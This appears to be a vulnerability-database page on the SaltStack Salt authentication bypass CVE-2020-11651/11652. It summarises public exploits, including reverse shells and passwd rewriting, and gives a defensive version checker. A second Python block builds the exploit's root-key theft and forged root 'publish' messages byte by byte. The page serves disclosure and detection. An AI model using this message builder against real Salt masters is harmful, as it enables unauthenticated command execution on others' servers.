Exploitation Summary
CVE-2020-11651 is actively exploited and listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, added November 3, 2021.
EIP tracks 17 public exploits from researchers including jasperla, rossengeorgiev and dozernz, among them the Metasploit module auxiliary/gather/saltstack_salt_root_key.
AI-analyzed exploit summary
This is a functional proof-of-concept exploit for CVE-2020-11651 and CVE-2020-11652, targeting SaltStack's authentication bypass and arbitrary command execution vulnerabilities. It demonstrates filesystem access, command scheduling on master/minions, and file upload capabilities.
Description
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.
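The affected ranges above are the whole of the version test a compliance check needs: anything below 2019.2.4, and the 3000 line below 3000.2. The following is an added example, not code from the page or from any of the scanners it lists, that applies that test to the output of `salt --versions-report`. The report text is a constructed sample, and the `Salt:` line regex is an assumption about the report layout. One caveat a practitioner should keep in mind: backported fixes for older release lines did not always bump the version string, so a version match is evidence of exposure, not proof of it.

```python
# Added example (not from the page or any listed scanner): the CVE-2020-11651 /
# CVE-2020-11652 affected-range test from the advisory, applied to the text of
# `salt --versions-report`. The report below is a constructed sample and the
# "Salt:" line pattern is an assumption about that command's layout.
import re

FIXED_2019 = (2019, 2, 4)   # 2019.2.4 is the first fixed 2019.2 release
FIXED_3000 = (3000, 2)      # 3000.2 is the first fixed 3000 release

def parse_salt_version(text):
    """'2019.2.3', '3000', '3000.1' or 'salt 3000.2' -> tuple of ints.

    Date-based Salt versions are four digits wide, so the regex anchors on
    that; pre-2014 0.x versions are out of scope and return None."""
    m = re.search(r"(\d{4})(?:\.(\d+))?(?:\.(\d+))?", text)
    if not m:
        return None
    return tuple(int(p) for p in m.groups() if p is not None)

def is_vulnerable_version(version):
    """True when the version falls in an affected range named in the advisory.

    Below 2019.2.4 covers every older release line (2018.3.x, 2017.7.x, ...);
    the 3000 line is affected below 3000.2; 3001 and later were cut after the
    fix and are not affected."""
    v = parse_salt_version(version) if isinstance(version, str) else version
    if v is None:
        raise ValueError("unrecognised Salt version: %r" % (version,))
    if v[0] >= 3000:
        return v[0] == 3000 and v < FIXED_3000
    return v < FIXED_2019

def salt_version_from_report(report):
    """Pull the Salt version out of `salt --versions-report` text."""
    m = re.search(r"^\s*Salt:\s*(\S+)", report, re.MULTILINE)
    return m.group(1) if m else None

def assess_report(report):
    """Return (version, vulnerable) for one report, or (None, None) if the
    version line is missing."""
    ver = salt_version_from_report(report)
    return (ver, is_vulnerable_version(ver)) if ver else (None, None)

# Constructed sample of a versions-report from a master that still runs
# 2019.2.3; not real command output.
SAMPLE_REPORT = """Salt Version:
           Salt: 2019.2.3

Dependency Versions:
           cffi: Not Installed
        msgpack: 0.6.2
          pyzmq: 18.0.1
"""

if __name__ == "__main__":
    for v in ("2018.3.4", "2019.2.3", "2019.2.4", "3000", "3000.1", "3000.2", "3001"):
        print("%-9s vulnerable=%s" % (v, is_vulnerable_version(v)))
    print("sample report:", assess_report(SAMPLE_REPORT))
```

Because the test only needs the version tuple, the same function works for package-manager output (`rpm -q salt-master`, `dpkg -s salt-master`) once the version string is extracted; the report parser is just the common case.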
Exploits (17)
This is a functional proof-of-concept exploit for CVE-2020-11651 and CVE-2020-11652, targeting SaltStack's authentication bypass and arbitrary command execution vulnerabilities. It demonstrates filesystem access, command scheduling on master/minions, and file upload capabilities.
This repository provides a Python script to check if a SaltStack master is vulnerable to CVE-2020-11651 and CVE-2020-11652. It includes patches for unsupported Salt versions and a scanner to verify vulnerability status.
This PoC exploits CVE-2020-11651, an authentication bypass vulnerability in SaltStack, to achieve pre-auth RCE on the master node and/or associated minions. It retrieves the root key and executes arbitrary commands via the SaltStack transport mechanism.
This PoC exploits CVE-2020-11651, an authentication bypass in SaltStack Salt's ClearFuncs class, allowing unauthenticated remote command execution on the salt-master and minions. It includes functionality to fetch the root key, execute commands, and transfer files.
This is a functional exploit for CVE-2020-11651, an authentication bypass vulnerability in SaltStack. It allows unauthenticated access to the Salt master's root key and subsequent remote command execution or file reading.
This repository contains a compliance profile to check for vulnerable versions of SaltStack affected by CVE-2020-11651 and CVE-2020-11652. It verifies package versions and command-line output to ensure systems are patched or not installed.
This PoC exploits CVE-2020-11651, an authentication bypass vulnerability in SaltStack Salt, allowing unauthenticated remote command execution, file reads, and writes on the Salt Master. It uses ZeroMQ and MessagePack to craft payloads for the Salt master's request server (TCP/4506), the channel that carries the ClearFuncs publish call.
This repository contains a Python-based exploit for CVE-2020-11651 and CVE-2020-11652, targeting SaltStack's authentication bypass and directory traversal vulnerabilities. It includes functionality for remote command execution, file read/write operations, and a reverse shell payload.
This repository contains a functional exploit for CVE-2020-11651 and CVE-2020-11652, targeting SaltStack's authentication bypass and directory traversal vulnerabilities. It includes features for remote command execution, file read/write, and reverse shell establishment.
This is a functional exploit for CVE-2020-11651 and CVE-2020-11652, targeting SaltStack's authentication bypass and remote code execution vulnerabilities. It allows adding a new user or replacing the root user by modifying /etc/passwd and /etc/shadow files.
This repository contains a scanning tool for detecting SaltStack vulnerabilities CVE-2020-11651 and CVE-2020-11652, which allow unauthenticated remote code execution and token disclosure. The tool includes methods for token disclosure and out-of-band DNS-based command injection detection.
This is a functional exploit for CVE-2020-11651 and CVE-2020-11652, targeting SaltStack's authentication bypass and remote code execution vulnerabilities. It includes methods to check for vulnerabilities, read/write files, and execute commands on the target system.
This is a functional exploit for CVE-2020-11651, targeting SaltStack's authentication bypass and arbitrary command execution vulnerabilities. It includes capabilities to retrieve the root key, execute commands on minions, and read/write files on the master.
This Metasploit module exploits an unauthenticated access vulnerability in SaltStack Salt master's ZeroMQ request server to disclose the root key used for authenticating administrative commands. It leverages the _prep_auth_info() method to extract the root key from serialized authentication data.
This repository contains a functional exploit for CVE-2020-11651 and CVE-2020-11652, targeting SaltStack's authentication bypass and arbitrary file read/write vulnerabilities. The PoC includes methods for remote code execution, file operations, and shell acquisition.
This repository contains a functional exploit for CVE-2020-11652, targeting SaltStack's authentication bypass and directory traversal vulnerability. The Go-based PoC interacts with the SaltStack master's ZeroMQ interface to extract the root key and read arbitrary files (e.g., /etc/passwd).
This exploit demonstrates an authentication bypass and remote code execution vulnerability in SaltStack Salt before 2019.2.4 and 3000 before 3000.2, including the older 2017 and 2018 release lines. It leverages CVE-2020-11651 and CVE-2020-11652 to read files, write files, and execute commands on the target system.
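The Description and the auxiliary/gather/saltstack_salt_root_key entry above describe the same two-step exchange: an unauthenticated `_prep_auth_info` call that returns the master's root key, then a `publish` that presents that key as root. The block below is an added example, not code from any of the listed PoCs or from Salt itself, that shows both messages at the byte level together with the master-side dispatch check that made the first one reachable. Salt's request server speaks msgpack over ZeroMQ REQ/REP on TCP/4506; a small msgpack subset is hand-rolled here so the file runs with the standard library alone (real clients use the `msgpack` package). Nothing touches the network: the master reply is a constructed sample, the `publish` field set is modelled on what the public PoCs send and is an assumption rather than a verified minimum, and the allowlist stands in for the fix's `expose_methods` with membership that is also assumed.

```python
# Added example, not code from the PoCs or the Metasploit module listed above.
# Salt's request server takes msgpack over ZeroMQ REQ/REP (TCP/4506); a
# payload with enc="clear" names a ClearFuncs method in load["cmd"]. Before
# 2019.2.4 / 3000.2 the dispatcher rejected only names starting with "__", so
# the single-underscore helper _prep_auth_info was callable with no credential
# and its return value carries the master's root key. The msgpack subset below
# (nil, bool, str under 256 bytes, arrays and maps under 16 items) is
# hand-rolled so only the standard library is needed.

def pack(obj):
    """Encode the msgpack subset this example needs."""
    if obj is None:
        return b"\xc0"
    if isinstance(obj, bool):
        return b"\xc3" if obj else b"\xc2"
    if isinstance(obj, str):
        raw = obj.encode("utf-8")
        if len(raw) < 32:                          # fixstr
            return bytes([0xA0 | len(raw)]) + raw
        if len(raw) < 256:                         # str 8
            return b"\xd9" + bytes([len(raw)]) + raw
        raise ValueError("string too long for this subset")
    if isinstance(obj, (list, tuple)) and len(obj) < 16:   # fixarray
        return bytes([0x90 | len(obj)]) + b"".join(pack(x) for x in obj)
    if isinstance(obj, dict) and len(obj) < 16:            # fixmap
        return bytes([0x80 | len(obj)]) + b"".join(pack(k) + pack(v) for k, v in obj.items())
    raise TypeError("unsupported value: %r" % (obj,))

def unpack(buf):
    """Decode one object (same subset); rejects trailing bytes."""
    obj, end = _decode(buf, 0)
    if end != len(buf):
        raise ValueError("trailing bytes after msgpack object")
    return obj

def _decode(buf, i):
    b = buf[i]
    i += 1
    if b == 0xC0:
        return None, i
    if b in (0xC2, 0xC3):
        return b == 0xC3, i
    if b & 0xE0 == 0xA0:                           # fixstr
        n = b & 0x1F
        return buf[i:i + n].decode("utf-8"), i + n
    if b == 0xD9:                                  # str 8
        n = buf[i]
        return buf[i + 1:i + 1 + n].decode("utf-8"), i + 1 + n
    if b & 0xF0 == 0x90:                           # fixarray
        items = []
        for _ in range(b & 0x0F):
            v, i = _decode(buf, i)
            items.append(v)
        return items, i
    if b & 0xF0 == 0x80:                           # fixmap
        d = {}
        for _ in range(b & 0x0F):
            k, i = _decode(buf, i)
            v, i = _decode(buf, i)
            d[k] = v
        return d, i
    raise ValueError("msgpack type byte 0x%02x not handled here" % b)

# Client side: the two messages the PoCs send to tcp://<master>:4506.

def build_prep_auth_info_request():
    """Step 1: the unauthenticated call to the leaked helper."""
    return pack({"enc": "clear", "load": {"cmd": "_prep_auth_info"}})

def extract_root_key(reply_bytes):
    """_prep_auth_info answers [auth_type, err_name, key_dict, sensitive_keys];
    key_dict maps master-local users to keys, so ["root"] is the root key.
    Returns None when the reply does not have that shape."""
    try:
        return unpack(reply_bytes)[2]["root"]
    except (ValueError, IndexError, KeyError, TypeError):
        return None

def build_publish_request(root_key, tgt, fun, arg):
    """Step 2: a 'publish' presenting the stolen key as the master's root user.
    Field set modelled on the public PoCs (assumption, not a verified minimum)."""
    load = {"cmd": "publish", "user": "root", "key": root_key, "tgt": tgt,
            "tgt_type": "glob", "fun": fun, "arg": list(arg), "ret": "", "jid": ""}
    return pack({"enc": "clear", "load": load})

# Master side: the dispatch check that was wrong, beside the fixed shape.

def reachable_before_fix(cmd):
    """Pre-fix: only dunder names were filtered, so every single-underscore
    helper on ClearFuncs was callable in the clear."""
    return not cmd.startswith("__")

# Allowlist in the shape of the fix's ClearFuncs.expose_methods; the exact
# membership is an assumption for illustration.
EXPOSED_CLEAR_METHODS = ("ping", "publish", "get_token", "mk_token", "wheel", "runner")

def reachable_after_fix(cmd):
    """Fixed releases dispatch only names on an explicit allowlist."""
    return cmd in EXPOSED_CLEAR_METHODS

# Constructed sample of a vulnerable master's reply; the key is a placeholder.
SAMPLE_ROOT_KEY = "constructed-root-key-" + "0" * 43
SAMPLE_VULNERABLE_REPLY = pack(["eauth", "EauthAuthenticationError",
                               {"root": SAMPLE_ROOT_KEY}, ["username", "password"]])
```

Reading the two dispatch functions side by side is the point: a denylist on a name prefix leaves every helper that happens to use a single underscore exposed, while the allowlist makes the reachable surface an explicit, reviewable list. A detection rule can use the same framing: any clear-channel request whose `load["cmd"]` is not on the allowlist is worth alerting on, regardless of whether the master is patched.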
References (12)
Scores
CVSS v3.1 base score: 9.8 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H